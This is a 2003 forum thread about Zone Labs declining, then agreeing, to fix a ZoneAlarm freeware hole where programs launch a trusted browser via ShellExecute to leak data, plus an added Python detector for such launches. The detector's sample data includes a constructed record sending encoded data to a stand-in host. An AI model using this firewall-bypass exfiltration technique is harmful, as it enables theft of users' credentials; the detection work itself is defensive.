kairon Posted July 4, 2003

Zone Labs said it will not fix a vulnerability found in the freeware version of its ZoneAlarm firewall. The company said the vulnerability was a problem found in Windows, not its firewall, and that it would require the hacker equivalent of "brain surgery" to exploit.

Instead, Zone Labs executives said that the vulnerability could be protected against by using one of its paid products: ZoneAlarm Plus, ZoneAlarm Pro, or its Integrity enterprise system.

According to the posting to the BugTraq mailing list, the vulnerability involves the Windows shell32.dll file, which can invoke the ShellExecute function. When one of the parameters of ShellExecute is set to a Web address, the web browser is prompted to access the web site in question -- and, under most ZoneAlarm configurations, is allowed to freely access web sites without the express permission of the user.

According to the poster, "aceh", that browser could quickly access a malicious web site, funnel a short string of confidential information (such as a username and password) and quickly redirect itself to an innocuous and trusted web site.

Although not stated expressly, the vulnerability appears to first require a Trojan to be loaded onto the user's machine via an email virus or some other means. However, "aceh" concluded that the vulnerability is common to all of the freeware versions of ZoneAlarm. Executives at Zone Labs, however, said that the free version of ZoneAlarm provides adequate protection.

Read more @ ExtremeTech

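
As an added example (not part of the original post or the article it quotes): the article describes a program handing a web address to a browser that the firewall already trusts. The Python sketch below flags that pattern in process-creation records; the record layout, process names and sample events are constructed, and it assumes the launch creates a new browser process whose parent is the calling program.

```python
from urllib.parse import urlsplit

# Assumed for this sketch: browsers the firewall already trusts, and the
# parents that normally start them on the user's behalf.
BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}
EXPECTED_PARENTS = {"explorer.exe"} | BROWSERS

# Constructed process-creation records: (parent image, image, command line).
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
SAMPLE_EVENTS = [
    (r"C:\WINDOWS\explorer.exe", IE, f'"{IE}" http://www.example.com/'),
    (r"C:\Temp\updater.exe", IE, f'"{IE}" http://collector.example/c?d=QUJDREVG'),
    (r"C:\Office\winword.exe", IE, f'"{IE}" "http://intranet.example/help"'),
    (r"C:\WINDOWS\explorer.exe", r"C:\WINDOWS\notepad.exe", "notepad.exe a.txt"),
]

def basename(path):
    """Lower-cased file name of a Windows path, quotes removed."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()

def url_args(command_line):
    """Return the http(s) URLs passed as arguments on a command line."""
    found = []
    for token in command_line.split():
        token = token.strip('"')
        if not token.lower().startswith(("http://", "https://")):
            continue
        try:
            parts = urlsplit(token)
        except ValueError:  # malformed URL: ignore this token
            continue
        if parts.hostname:
            found.append(parts)
    return found

def flag_event(event):
    """Finding if a trusted browser was started with a URL by an unexpected parent."""
    parent, image, command_line = event
    if basename(image) not in BROWSERS or basename(parent) in EXPECTED_PARENTS:
        return None
    urls = url_args(command_line)
    if not urls:
        return None
    return {"parent": basename(parent), "browser": basename(image),
            "hosts": [u.hostname for u in urls],
            "carries_data": any(u.query for u in urls)}

def scan(events):
    """Run flag_event over all records and keep the findings."""
    return [f for f in map(flag_event, events) if f]
```

A hit without a query string, like the word-processor record here, is usually a user clicking a link, so findings need triage rather than automatic blocking.
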
bangbang023 Veteran Posted July 4, 2003

kinda sucks for those freeware users.

enigma-penguin Veteran Posted July 4, 2003

if it's a problem with windows it's not their problem.... and even if it was it's the freeware version (they are a company you know, they want/need to make money) and it'll just be a nudge to say ..come on buy a copy

besides ms isn't gonna fix it either... they won't even fix that 100% cpu usage bug

empty Posted July 4, 2003

Pah, good firewall, crappy company.

RazorSA Posted July 4, 2003

get the full version, pay the $$$

kagaku Posted July 4, 2003

Or get yourself a real router/firewall. www.smoothwall.org / www.clarkconnect.org / www.freebsd.org

All good choices. :p

MxxCon Posted July 4, 2003

they WILL FIX free version after all so this article isn't really relevant now

but still nice to know that ZoneLabs is thinking of money before security

EnisDonKing_ Posted July 4, 2003

kinda lame try to *scare* some users which will switch on pro version imm.

bangbang023 Veteran Posted July 5, 2003

> but still nice to know that ZoneLabs is thinking of money before security

yeah no kidding, imagine if MS did something like this? People wouldn't stop b*tching.

SiXXGuNNZ Posted July 5, 2003

couldn't ya just manually add shell32.dll to the programs list and block everything from it?

aem4162 Posted July 5, 2003

> they WILL FIX free version after all so this article isn't really relevant now
> but still nice to know that ZoneLabs is thinking of money before security

this was on screensavers last night or the night before...ss was going to report that za wasn't going to fix the hole and then za heard about it and said they'd fix it...something like that

MxxCon Posted July 5, 2003

> > they WILL FIX free version after all so this article isn't really relevant now
> > but still nice to know that ZoneLabs is thinking of money before security
>
> this was on screensavers last night or the night before...ss was going to report that za wasn't going to fix the hole and then za heard about it and said they'd fix it...something like that

http://www.dslreports.com/shownews/30039 :whistle:

bangbang023 Veteran Posted July 5, 2003

it's amazing what fear of bad publicity will do to a company.

Mr. Black Posted July 6, 2003

This decision was reversed the other day.

Sierra Posted July 6, 2003

ZA rules ! ;)

housegroover Posted July 7, 2003

> Or get yourself a real router/firewall. www.smoothwall.org / www.clarkconnect.org / www.freebsd.org
> All good choices. :p

What sort of firewall would do for a PC? home use. PM if you can.